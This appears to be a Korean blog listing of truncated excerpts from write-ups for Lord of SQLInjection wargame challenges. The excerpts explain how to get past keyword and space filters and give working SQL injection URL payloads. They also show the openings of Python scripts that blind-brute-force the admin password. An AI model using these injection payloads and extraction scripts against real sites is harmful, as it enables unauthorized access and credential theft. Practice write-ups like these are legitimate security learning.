Bace

문제는 다음과 같다. pw는 '를 필터링하고 있고, no에는 ' 와 substr, ascii, =, or, and, 공백, like, 0x 등을 필터링하고 있다. 공백을 우회하기 위해 %0a substr, ascii를 우회하기 위해 mid와 hex like를 우회하기 위해 in or, and를 우회하기 위해 ||, &&를 사용하였다. 처음엔 darkknight와 같이 char를 통해 admin을 보내봤으나, in으로는 char를 못받는것 같다. 그래서 ("admin") 을 통해 보내보았다. Hello admin이 뜬다. 코드를 통해 pw를 찾았다. import requests answer = '' for i in range(1,9): for j in range(33,128): url = 'https://..

문제는 다음과 같다. pw와 no 모두 '를 필터링 하고 있고, no는 substr과 ascii를 필터링 하고 있다. 근데 no는 '' 로 받지 않고 그냥 받아 들이므로, '를 통해 빠져나갈 필요가 없다. 그러므로 no쪽으로 공격을 하는데, admin을 문자로 인식 시키기 위해 char를 썼다. ?pw=&no=1%20or%20id%20like%20char(97,100,109,105,110)%20and%20ord(mid(pw,1,1))%20like%201%20--%20- 이와 같이 보내주었다. import requests answer = '' for i in range(1,9): for j in range(33,128): url = "https://los.rubiya.kr/chall/darkknight_5..

문제는 다음과 같다. orge 문제와 똑같지만, 이번에는 =과 substr이 필터링 되어있다. like를 통해 =을 우회하고, mid를 통해 substr을 우회하였다. import requests answer = '' for i in range(1,9): for j in range(33,128): url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=%27%20||%20id like 'admin' %26%26 ascii(mid(pw,{},1))%20like%20{}%20--%20-".format(i,j) cookies = {'PHPSESSID':'자신의 PHPSESSID'} response = requests.ge..

문제는 다음과 같다. id만 admin이면 풀리는 문제 같다. pw 값에 0을 넣어주고 or id=admin 을 넣어준 후 뒤에 주석 처리해서 보내보았다. ?pw=0%27%20or%20id=%27admin%27%23 solve